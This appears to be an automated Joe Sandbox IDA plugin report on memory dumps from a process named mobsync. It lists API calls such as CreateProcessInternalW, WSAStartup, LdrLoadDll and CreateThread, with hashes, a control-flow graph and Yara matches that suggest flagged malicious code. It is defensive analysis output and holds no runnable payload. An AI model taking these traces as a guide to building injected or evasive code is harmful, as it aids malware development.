                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cffe5dd0becc318a9c5f1abd4c4954ae817c310599c1f6ef82dec359c071c792
                                                                    • Instruction ID: 6ec962aa6ae27b237abbb9b7b13c0811a224a4deb54021090a708896bab5f1d5
                                                                    • Opcode Fuzzy Hash: cffe5dd0becc318a9c5f1abd4c4954ae817c310599c1f6ef82dec359c071c792
                                                                    • Instruction Fuzzy Hash: 4890026234140442F11071584818B061005CBE1305F96C029E1065554D861DDD526126
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 485082eb3ac68991bf7234e05eb06883e7cb120564c0bf5c1e264151a41b206a
                                                                    • Instruction ID: a062b9a05b3a2e68631c8d7646a2e80593c584d2b18b403313bfe6d545388907
                                                                    • Opcode Fuzzy Hash: 485082eb3ac68991bf7234e05eb06883e7cb120564c0bf5c1e264151a41b206a
                                                                    • Instruction Fuzzy Hash: 9590022224545102F160715C48086165005ABE0205F96C035A0815594D8559D9556221
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 56227a90c7921e7cbdfeb750963137beedc7df615703445fbb6da685e8823a1f
                                                                    • Instruction ID: 6684fb30280a1acf9e3bf1d1a6c87660099beb252a98669a1083dee61df91671
                                                                    • Opcode Fuzzy Hash: 56227a90c7921e7cbdfeb750963137beedc7df615703445fbb6da685e8823a1f
                                                                    • Instruction Fuzzy Hash: DC900226221400022155B5580A0850B14459BD63553D6C029F1417590CC625D9655321
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4c05fffa012c0a17e2a5976e856be3e348aeed1962deb5c0168374360a497e34
                                                                    • Instruction ID: 291929a9e209d5a89190d0acfdf062a03a9f7b735a40144d60932b619c709525
                                                                    • Opcode Fuzzy Hash: 4c05fffa012c0a17e2a5976e856be3e348aeed1962deb5c0168374360a497e34
                                                                    • Instruction Fuzzy Hash: 44900226211400032115B5580B0850710468BD5355396C035F1016550CD625D9615121
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8bdd60c90e5412da3b75e3817972bf41a6acd0893f707f875200939ce16dbb06
                                                                    • Instruction ID: 262ba4b2b08e9d312f2650b1083b6d9bd9de61b0f80239f7ca35508b2ac1cf15
                                                                    • Opcode Fuzzy Hash: 8bdd60c90e5412da3b75e3817972bf41a6acd0893f707f875200939ce16dbb06
                                                                    • Instruction Fuzzy Hash: 7790026220240003611571584818616500A8BE0205B96C035E1015590DC529D9916125

                                                                    Control-flow Graph

                                                                    control_flow_graph 772 7ff57a-7ff5dc CoInitialize 773 7ff5e5-7ff5e7 772->773 774 7ff5ed-7ff5fe 773->774 775 7ff67b-7ff68b CoUninitialize 773->775 777 7ff670-7ff678 774->777 778 7ff600-7ff610 774->778 777->775 780 7ff615-7ff617 778->780 781 7ff619-7ff61e 780->781 782 7ff662-7ff66d 780->782 783 7ff65a-7ff660 781->783 784 7ff620-7ff62d call 80b8e0 781->784 782->777 783->778 783->782 788 7ff62f-7ff631 784->788 789 7ff634-7ff656 call 80b6e0 call 80b4c0 784->789 788->789 789->783
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: 96b0881fd07dff17c59dfce60016d8e8923d03334d2525125ce0c832c77777f4
                                                                    • Instruction ID: d08685eaacc33d9f83524d711fa07932ce42497a0306363969fdec2f535e30bf
                                                                    • Opcode Fuzzy Hash: 96b0881fd07dff17c59dfce60016d8e8923d03334d2525125ce0c832c77777f4
                                                                    • Instruction Fuzzy Hash: 23311275A00609AFDB00DFD8C8809EEB7B9FF48304B108559E515E7354DB75AE458BA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: ed75d6616b26e0c3adbeb4f1aea2539e4430a090231e29fb9bcc86b23fd5cf95
                                                                    • Instruction ID: 92dc7fb661812d406fe8e82f603351f508f83187c1bd5b4bfc955e4d40fed369
                                                                    • Opcode Fuzzy Hash: ed75d6616b26e0c3adbeb4f1aea2539e4430a090231e29fb9bcc86b23fd5cf95
                                                                    • Instruction Fuzzy Hash: 8A312175A00609AFDB00DFD8CC809EEB7B9FF88304B108559E515EB354DB75EE058BA0
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 00803BDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: wininet.dll
                                                                    • API String ID: 3472027048-3354682871
                                                                    • Opcode ID: dad42f9425a0be8bfe4aedd0d3202683c3911ffb27a686497fa1a9228a725e0c
                                                                    • Instruction ID: 630630828abe78caa040e45786d3bb6367d172ffefb6ad9599a2c1a98ba16bf7
                                                                    • Opcode Fuzzy Hash: dad42f9425a0be8bfe4aedd0d3202683c3911ffb27a686497fa1a9228a725e0c
                                                                    • Instruction Fuzzy Hash: BA316CB1601705ABD714DFA4CC85FEBB7B8FB88714F104518FA19AB281D770AA50CBA5
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 007F1E47
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Startup
                                                                    • String ID:
                                                                    • API String ID: 724789610-0
                                                                    • Opcode ID: 4470723ee3262db500b3f4f9e3ef814e750869777184048a513af10152822a77
                                                                    • Instruction ID: c071a29fe40e8d240a51131fc216706f6658f09995cc2921581792e1c45163f6
                                                                    • Opcode Fuzzy Hash: 4470723ee3262db500b3f4f9e3ef814e750869777184048a513af10152822a77
                                                                    • Instruction Fuzzy Hash: 4D917C71E00209EFDB54DFA9CC45BEEB7B8BF48704F544129E608E7281E7746A04CBA5
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 007F847A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: eafe77c9c000052e91b0869083202efc1ca2d9f42041edd40a6d132cfb4796b9
                                                                    • Instruction ID: 0450ddb22095de117769a94bcbadfcdb5a7c0a72d53861df41a6e15518feb6cc
                                                                    • Opcode Fuzzy Hash: eafe77c9c000052e91b0869083202efc1ca2d9f42041edd40a6d132cfb4796b9
                                                                    • Instruction Fuzzy Hash: 973135B21106999FDF81EB74C9863F53BA5EB15360B5C0949D5828F253EA29C806CF83
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 007F1E47
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Startup
                                                                    • String ID:
                                                                    • API String ID: 724789610-0
                                                                    • Opcode ID: 953fd33db263d66204f48021afca69beda3239a1d111d1df2d087bbf96fd00cd
                                                                    • Instruction ID: 400284d5c75d4b92c49cbd7b13c52df431279eb9cdfe2432d95514c8c7b34ac9
                                                                    • Opcode Fuzzy Hash: 953fd33db263d66204f48021afca69beda3239a1d111d1df2d087bbf96fd00cd
                                                                    • Instruction Fuzzy Hash: 1211D271D01308EFDB00DBA48C46BEEB7B8AF49300F100196EA08F7242E6746F4887E6
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007F46F2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                    • Instruction ID: 5bf3674d21c85dd01fb42aa8433c1d12812b48ad19aed1504842def0af18987e
                                                                    • Opcode Fuzzy Hash: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                    • Instruction Fuzzy Hash: CB0112B6E0020DA7DB10EBA4DC42FAEB378AB54308F004295AA09D7281F635EB148B52
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,007F8414,00000010,?,?,?,00000044,?,00000010,007F8414,?,00000000,?), ref: 0080985D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 4d52db16253917bd74d5aecb03740b25dbf256a6284b3af76faf9b015384252b
                                                                    • Instruction ID: ef909e1949cfbcb09e894122ba3473081f7f3f39919f1fced52e50d6dca87fda
                                                                    • Opcode Fuzzy Hash: 4d52db16253917bd74d5aecb03740b25dbf256a6284b3af76faf9b015384252b
                                                                    • Instruction Fuzzy Hash: AA0180B2214648BBCB44DE89DC85EDB77ADEF8C754F418108FA19E3241D630F8518BA8
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007F46F2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 6d77bacdb1d3529f7168cc01b32e97690413d3805374c4ced6db3b9f3292659f
                                                                    • Instruction ID: aec8fb0beefff8027804e89c5ed410f5e84b7b6f4a65e8088aed2dd3ce94cd5c
                                                                    • Opcode Fuzzy Hash: 6d77bacdb1d3529f7168cc01b32e97690413d3805374c4ced6db3b9f3292659f
                                                                    • Instruction Fuzzy Hash: FCF0C27A90020EABEB10CF94CD82FEDB7B4EB58718F004295E90DD7241F230AA05CB51
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007E9B92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007E9B92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 007F847A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,007F1E90,0080800F,008056CF,007F1E60), ref: 007F8281
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID:
                                                                    • API String ID: 3861434553-0